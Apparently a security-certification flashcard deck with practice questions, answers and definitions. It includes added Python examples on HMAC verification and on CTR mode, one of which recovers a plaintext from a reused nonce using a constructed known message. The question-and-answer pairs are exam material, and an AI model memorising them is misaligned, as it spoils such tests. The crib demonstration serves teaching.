Chap 2-134: Fred is responsible for physical security at his company. He wants to find a good way to protect the USB thumb drives that have BitLocker keys stored on them. Which of the following would be the best solution for this situation? Store the drives in a secure cabinet or safe Encrypt the thumb drives Dont store BitLocker keys on these drives Lock the thumb drives in a desk drawer
Store the drives in a secure cabinet or safe
169
Chap 2-137: What is the primary threat against static codes used for multifactor authentication? Brute Force Collisions Theft Clock mismatch
Theft
170
Chap 1-139: The company that Devin works for has selected a nondescript building and does not use exterior signage to advertise that the facility belongs to them. What physical security term describes this type of security control? Industrial camouflage Demilitarized zone Industrial obfuscation Disruptive colorization
Industrial Camouflage
171
Chap 2-141: When you are concerned about application security, what is the most important issue in memory management? Never allocate a variable any larger than needed Always check the bounds on an array Always declare a variable where you need it (i.e., at function or file level if possible) Make sure you release any memory you allocate
Make sure you release any memory you allocate
172
Chap 2-146: Social login, the ability to use an existing identity from a site like Google or Facebook, or a Microsoft account, is an example of which of the following concepts? Federation AAA Privilege creep Identity and access management
Federation
173
Federation
Federated identity is a method of linking a user's identity across multiple separate identity management systems.
174
Chap 2-148: Which cloud service model provides the customer with the infrastructure to create applications and host them? SaaS PaaS IaaS IDaaS
PaaS
175
Chap 2-149: Why is avoiding the initialization vector and key reuse recommended to ensure secure encryption? It makes it impossible to brute force It means a single successful attack will not expose multiple messages It means a single successful attack will not expose any messages It makes brute force easier
It means a single successful attack will not expose multiple messages
176
Initialization vector
An initialization vector (IV) is a value combined with the secret key when encrypting so that the same plaintext under the same key produces different ciphertext each time. In modes such as CTR and GCM the IV is a nonce (number used once) and must never be reused with the same key; in CBC it must also be unpredictable. A reused IV lets an attacker compare ciphertexts and, in stream-style modes, cancel the keystream out entirely.
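The Counter mode card and the initialization vector card above, worked in code as an added example that is not from the flashcards: CTR mode built on a block function, followed by what goes wrong when the nonce repeats. The block function here is HMAC-SHA256 standing in for a real block cipher such as AES, so that the example runs with the standard library alone; the mode logic is unchanged by that substitution. The messages are constructed.

```python
"""Counter (CTR) mode and why a nonce must never repeat under one key.

Added example, not from the flashcards. The block function is HMAC-SHA256
standing in for a real block cipher such as AES, so that this runs with the
standard library only; the mode logic is unchanged. Messages are constructed.
"""
import hashlib
import hmac
import os
import struct

BLOCK_BYTES = 32   # size of one keystream block from the stand-in PRF
NONCE_BYTES = 8


def keystream_block(key: bytes, nonce: bytes, counter: int) -> bytes:
    """E_key(nonce || counter): in real CTR mode this is one AES call."""
    return hmac.new(key, nonce + struct.pack(">Q", counter), hashlib.sha256).digest()


def ctr_crypt(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """XOR data with the keystream. Encryption and decryption are the same operation."""
    out = bytearray()
    for block_index, start in enumerate(range(0, len(data), BLOCK_BYTES)):
        ks = keystream_block(key, nonce, block_index)
        out.extend(d ^ k for d, k in zip(data[start:start + BLOCK_BYTES], ks))
    return bytes(out)


def encrypt(key: bytes, plaintext: bytes) -> bytes:
    """Fresh random nonce per message, prepended so the receiver can rebuild the keystream."""
    nonce = os.urandom(NONCE_BYTES)
    return nonce + ctr_crypt(key, nonce, plaintext)


def decrypt(key: bytes, blob: bytes) -> bytes:
    return ctr_crypt(key, blob[:NONCE_BYTES], blob[NONCE_BYTES:])


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def nonce_reuse_leak(ciphertext1: bytes, ciphertext2: bytes) -> bytes:
    """Two messages under the same key and nonce share a keystream, so
    c1 XOR c2 == p1 XOR p2: the keystream cancels without knowing the key."""
    return xor_bytes(ciphertext1, ciphertext2)


def recover_with_crib(leak: bytes, known_plaintext: bytes) -> bytes:
    """Knowing (or guessing) one plaintext reveals the other's overlapping bytes."""
    return xor_bytes(leak, known_plaintext)


if __name__ == "__main__":
    key = os.urandom(32)
    print(decrypt(key, encrypt(key, b"hello, counter mode")))
    bad_nonce = b"\x00" * NONCE_BYTES                 # constructed: the same nonce used twice
    c1 = ctr_crypt(key, bad_nonce, b"transfer 100 to alice")
    c2 = ctr_crypt(key, bad_nonce, b"transfer 999 to mallory")
    print(recover_with_crib(nonce_reuse_leak(c1, c2), b"transfer 100 to alice"))
```

Note that CTR mode on its own gives no integrity: flipping a ciphertext bit flips the same plaintext bit, which is why it is normally paired with a MAC (as in GCM) rather than used bare.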
177
Detective Control
identifies security threats that have already occurred; e.g.: intrusion detection system, IDS
178
What are the types of controls?
Preventive Detective Corrective Deterrent Physical Compensating
179
Deterrent Control
seek to prevent an attacker from attempting to violate security policies; e.g.: guard dogs, barbed wire fences
180
Compensating Control
designed to mitigate the risk associated with exceptions made to the security policy
181
Preventive Control
intend to stop a security issue before it occurs. e.g.: firewalls and encryption
182
Edge Computing
Edge Computing places both data storage and computation power closer to where it is needed to save on bandwidth and to improve the response of associated applications and services.
183
Chap 2-154: Ben replaces sensitive data in his database with unique identifiers. The identifiers allow him to continue to take actions on the data without exposing the data itself. What type of solution has he deployed? Masking Encryption Hashing Tokenization
Tokenization
184
Tokenization
Is the process of replacing sensitive data with unique identification symbols that retain all the essential information (e.g.: length and data type) about the data without compromising its security
185
Masking
Modifies content to conceal PII or other sensitive information
186
Chap 2-156: What additional capabilities does adding a digital signature to an encrypted message provide? Integrity and nonrepudiation Confidentiality and integrity Availability and nonrepudiation Confidentiality and availability
Integrity and nonrepudiation
187
Chap 2-157: Megan has been asked to set up a periodic attestation process for accounts in her organization. What has she been asked to do? Validate that the users are still employed Validate that the users' rights and permissions are still correct Require users provide proof of identity Validate security controls as part of the test
Validate that the users' rights and permissions are still correct Attestation processes request responsible managers or other individuals to validate that user entitlements or privileges are correct and match those that the user should have
188
Chap 2-159: What does the Message Authentication Code (MAC) do when used as part of a cryptographic system? It validates the message's integrity and authenticity It validates the message's confidentiality and authenticity It protects the message's integrity and authenticity None of the Above
It validates the message's integrity and authenticity
189
Message Authentication Code (MAC)
also referred to as a tag, is a short value computed over a message with a secret key shared by sender and receiver. The receiver recomputes the tag and compares it with the one received to verify that the message came from a holder of the key and was not altered in transit. HMAC is the most common construction. A MAC provides no confidentiality and, because both parties hold the same key, no nonrepudiation.
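The exchange described above on both sides, as an added example that is not from the flashcards: the sender tags a message with HMAC-SHA256, the receiver verifies the tag in constant time before trusting the content, and an on-path edit is caught. The JSON message format and the sample payload are this example's own.

```python
"""Message authentication with HMAC-SHA256: tag on send, constant-time check on receive.

Added example, not from the flashcards. The message format (canonical JSON
body plus a separate tag) and the sample payload are this example's own.
"""
import hashlib
import hmac
import json
from typing import Tuple


def make_tag(key: bytes, message: bytes) -> bytes:
    return hmac.new(key, message, hashlib.sha256).digest()


def verify_tag(key: bytes, message: bytes, tag: bytes) -> bool:
    """compare_digest avoids leaking the position of the first mismatching byte via timing."""
    return hmac.compare_digest(make_tag(key, message), tag)


def send(key: bytes, payload: dict) -> Tuple[bytes, bytes]:
    """Sender side: canonical JSON so both ends tag exactly the same bytes."""
    message = json.dumps(payload, sort_keys=True, separators=(",", ":")).encode("utf-8")
    return message, make_tag(key, message)


def receive(key: bytes, message: bytes, tag: bytes) -> dict:
    """Receiver side: check the tag before parsing anything.

    The body travels in the clear; a MAC proves who wrote it and that it is
    unchanged, nothing more.
    """
    if not verify_tag(key, message, tag):
        raise ValueError("MAC verification failed")
    return json.loads(message)


def is_accepted(key: bytes, message: bytes, tag: bytes) -> bool:
    try:
        receive(key, message, tag)
        return True
    except ValueError:
        return False


def tamper(message: bytes, old: bytes, new: bytes) -> bytes:
    """What an on-path attacker can do without the key: edit the bytes."""
    return message.replace(old, new)


if __name__ == "__main__":
    key = b"\x01" * 32                                   # constructed shared key
    msg, tag = send(key, {"to": "alice", "amount": 10})
    print(receive(key, msg, tag))
    forged = tamper(msg, b'"amount":10', b'"amount":9999')
    print("forgery accepted:", is_accepted(key, forged, tag))
```

The tag is bound to the key as well as the message, so a valid tag cannot be moved to a modified body and a party without the key cannot produce one; both properties together are the "integrity and authenticity" in the card's answer.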
190
Chap 2-160: Charles wants to put a fire suppression system in place in an area where highly sensitive electronics are in use. What type of fire suppression system is best suited to this type of environment if Charles is concerned about potential harm to first responders or on-site staff? Pre-charge Dry pipe Inert gas Carbon Dioxide
Inert gas. Dry pipe and pre-charge (pre-action) systems discharge water, which damages electronics; carbon dioxide protects the equipment but displaces oxygen and can suffocate staff or first responders in the room
191
PDU
Power Distribution Unit, used to manage and distribute power
192
Corrective Controls
remediate security events that have already occurred. e.g.: restoring backups after a ransomware attack
193
Physical Controls
controls that impact the physical world. e.g.: fences, perimeter lighting, locks, fire suppression systems and burglar alarms
194
Chap 2-162: How does asymmetric encryption support nonrepudiation? Using digital signatures Using longer keys Using reversible hashes Using the recipient's public key
Using digital signatures
195
Chap 2-163: Olivia knows that she needs to consider geography as part of her security considerations. Which of the following is a primary driver of geographical considerations for security? MTR Natural Disasters Service integration Sprawl Avoidance
Natural Disasters
196
MTR
maximum time to restore
197
Chap 2-169: Gabby wants to ensure that sensitive data can be transmitted in unencrypted form by using physical safeguards. What type of solution should she implement?
Shielded cables
Armored cables
Distribution lockdown
Protected cable distribution
Protected cable distribution. Protected cable distribution uses controls such as electrical, electromagnetic, and even acoustic or air-pressure sensors to ensure that cables and distribution infrastructure are not accessed, allowing sensitive information to be transmitted in unencrypted form.
198
Chap 2-172: John wants to protect data at rest so that he can process it and use it as needed in its original form. What solution from the following is best suited to this requirement?
Hashing
TLS
Encryption
Tokenization
Encryption
199
Chap 2-175: Isaac wants to use on-premises cloud computing. What term describes this type of cloud computing solution?
Infrastructure as a Service
Hybrid cloud
Private cloud
Platform as a Service
Private cloud
200
Chap 2-178: Charles has configured his multifactor system to require both a PIN and a password. How many effective factors does he have in place once he presents both of these and his username?
1
2
3
4
1. Although it may seem like Charles has presented two factors, in fact he has only presented two things he knows, along with his identity. To truly implement a multi-factor environment, he should use more than one of:
- something you have
- something you know
- something you are
201
Multi-factor attributes
Something you know
Something you have
Something you are
Somewhere you are
Something you can do
Something you exhibit
Someone you know
202
Chap 2-186: Yasmine wants to ensure that she met a geographic dispersal requirement for her data centers. How far away should she place her data center based on common best practices for dispersal?
12 miles
105 miles
3000 miles
45 miles
105 miles. The common recommendation is 60 to 120 miles apart, so that multiple data centers are not hit by the same natural disaster.
203
Chap 2-186: What term describes extending cloud computing to the edge of an enterprise network?
Local cloud
Fog computing
Managed cloud
Blade computing
Fog computing
204
Fog Computing
Extending cloud computing to the edge of an enterprise network. The term was coined by Cisco and is sometimes known as edge computing. Fog computing or fog networking, also known as fogging, is an architecture that uses edge devices to carry out a substantial amount of computation (edge computing), storage, and communication locally, with traffic routed over the Internet backbone.
205
Chap 2-188: Which of the following algorithms is a key stretching algorithm?
bcrypt
ncrypt
MD5
SHA1
bcrypt
206
Security Control Categories
Technical
Operational
Managerial
207
AAA
Authentication, Authorization and Accounting
208
RADIUS
uses UDP and encrypts the password only
209
TACACS+
uses TCP and encrypts the entire session